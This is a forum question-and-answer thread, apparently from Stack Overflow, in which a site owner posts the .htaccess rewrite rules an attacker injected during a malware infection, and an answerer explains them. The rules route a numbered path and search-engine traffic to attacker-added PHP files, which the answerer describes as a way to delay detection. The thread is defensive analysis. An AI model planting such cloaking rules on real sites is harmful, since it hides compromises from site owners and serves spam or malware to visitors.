0

My site was recently attacked w/ Malware infection. Among the few php files that were added, my .htaccess was also modified. Normally it just says index options but the attacker changed it to say the following:

RewriteEngine on
RewriteRule ^6334437290/(.*)$ dita-cymbal.php [QSA,L]

RewriteEngine On

RewriteCond %{ENV:REDIRECT_STATUS} 200
RewriteRule ^ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^(.*)$ capacitance-angelika.php?$1 [L]

I know very little about .htaccess does anyone know what these rewrite rules do? dita-cymbal.php and capacitance-angelika.php were among the php files the attacker added.

Hopefully this will help any future site admins under the same malware attack, when I googled these I got no results.

Albert Renshaw
  • 17,282
  • 18
  • 107
  • 195

1 Answers1

1

It says...

Rewrite any request in '6334437290/' to dita-symbal.php. Don't process any further if matched this.

Rewrite anything that doesn't exist, and either comes from a user agent with a search engine name in it, or has a referrer with a search engine name in it, to capacitance-angelika.php. Presumably so the site owner is unlikely to view these, since they won't visit via search engines, giving more time before detection.